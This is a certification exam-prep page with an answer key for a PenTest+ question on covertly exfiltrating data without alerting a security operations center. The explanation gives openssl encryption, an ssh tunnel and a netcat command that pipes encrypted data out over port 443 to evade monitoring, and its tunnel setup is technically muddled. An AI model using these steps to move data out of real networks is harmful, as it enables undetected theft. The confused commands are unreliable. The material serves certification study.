ExamGecko
Question list
Search
Search

List of questions

Search

Related questions











Question 67 - PT0-003 discussion

Report
Export

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

A.
Apply UTF-8 to the data and send over a tunnel to TCP port 25.
Answers
A.
Apply UTF-8 to the data and send over a tunnel to TCP port 25.
B.
Apply Base64 to the data and send over a tunnel to TCP port 80.
Answers
B.
Apply Base64 to the data and send over a tunnel to TCP port 80.
C.
Apply 3DES to the data and send over a tunnel UDP port 53.
Answers
C.
Apply 3DES to the data and send over a tunnel UDP port 53.
D.
Apply AES-256 to the data and send over a tunnel to TCP port 443.
Answers
D.
Apply AES-256 to the data and send over a tunnel to TCP port 443.
Suggested answer: D

Explanation:

AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.

Step-by-Step Explanation

Encrypting Data with AES-256:

Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.

Example encryption command using OpenSSL:

openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey

Setting Up a Secure Tunnel:

Use a tool like OpenSSH to create a secure tunnel over TCP port 443.

Example command to set up a tunnel:

ssh -L 443:targetserver:443 user@intermediatehost

Transferring Data Over the Tunnel:

Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.

Example Netcat command to send data:

cat encrypted.bin | nc targetserver 443

Benefits of Using AES-256 and Port 443:

Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.

Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.

Real-World Example:

During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.

Reference from Pentesting Literature:

Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.

Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

asked 02/10/2024
Raymond LaFrance
51 questions
User
Your answer:
0 comments
Sorted by

Leave a comment first